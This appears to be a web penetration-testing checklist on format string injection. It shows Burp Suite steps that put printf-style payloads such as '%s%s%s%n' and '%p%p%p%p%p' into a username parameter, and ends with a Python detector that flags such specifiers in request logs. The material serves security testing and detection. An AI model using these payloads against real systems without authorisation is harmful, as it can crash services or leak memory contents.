Format String Injection

Check List

Methodology

Black Box

Format string attack

1. Navigate to the target web application and identify an input parameter that is user-controllable. Normal request:

   GET /userinfo?username=unk9vvn HTTP/1.1
   Host: target.com

2. Using Burp Suite, intercept the request and check whether the value of the username parameter is processed on the server side. Inject a payload containing conversion specifiers into the username parameter:

   %s%s%s%n

3. Injected request (the % of each specifier is URL-encoded as %25 so that the server receives a literal %):

   GET /userinfo?username=%25s%25s%25s%25n HTTP/1.1
   Host: target.com

4. Send the request and observe the server response to determine whether the application crashes or displays unexpected output. If needed, inject another payload containing different conversion specifiers:

   %p%p%p%p%p

5. Injected request:

   GET /userinfo?username=%25p%25p%25p%25p%25p HTTP/1.1
   Host: target.com

6. Observe the server response to determine whether an error such as HTTP 500 or a timeout occurs. If the application crashes or displays unexpected output, the vulnerability is confirmed.
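As an added defensive check (example code, not part of the checklist): a small Python detector that decodes the query string of request lines like the ones above and flags parameters whose value carries printf-style conversion specifiers, either any %n or several specifiers in one value. The sample log lines and the MIN_SPECIFIERS threshold are constructed assumptions for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# printf-style conversion specifier: optional flags, width, precision and
# length modifier, then a conversion character (%% is a literal percent).
SPEC_RE = re.compile(
    r'%[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|L|q|j|z|t)?[diouxXeEfFgGaAcspn%]')

# Assumed rule: any %n is always flagged; otherwise flag a value that
# carries at least this many specifiers (one stray "% d" in prose is noise).
MIN_SPECIFIERS = 3


def find_format_specifiers(value: str) -> list[str]:
    """Return every conversion specifier in an already URL-decoded value."""
    return [m for m in SPEC_RE.findall(value) if m != '%%']


def inspect_request_line(request_line: str) -> list[dict]:
    """Check the query string of a raw request line ('GET /p?x=y HTTP/1.1').

    parse_qsl performs the percent-decoding, so %25s in the log becomes %s.
    Returns one finding per parameter that looks like a format string probe.
    """
    parts = request_line.split()
    if len(parts) < 2:
        return []
    query = urlsplit(parts[1]).query
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        specs = find_format_specifiers(value)
        has_write = any(s.endswith('n') for s in specs)
        if has_write or len(specs) >= MIN_SPECIFIERS:
            findings.append({'param': name, 'value': value,
                             'specifiers': specs, 'write_specifier': has_write})
    return findings


# Constructed sample log lines modelled on the requests in the checklist.
SAMPLE_LOG = [
    'GET /userinfo?username=unk9vvn HTTP/1.1',
    'GET /userinfo?username=%25s%25s%25s%25n HTTP/1.1',
    'GET /userinfo?username=%25p%25p%25p%25p%25p HTTP/1.1',
    'GET /search?q=100%25%20done HTTP/1.1',  # literal percent sign, not a probe
]


def scan_log(lines) -> dict:
    """Map each flagged request line to its findings."""
    hits = {}
    for line in lines:
        findings = inspect_request_line(line)
        if findings:
            hits[line] = findings
    return hits
```

Running scan_log(SAMPLE_LOG) flags only the two probe requests; the benign username and the "100% done" search term stay below the rule.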


White Box

Cheat Sheet
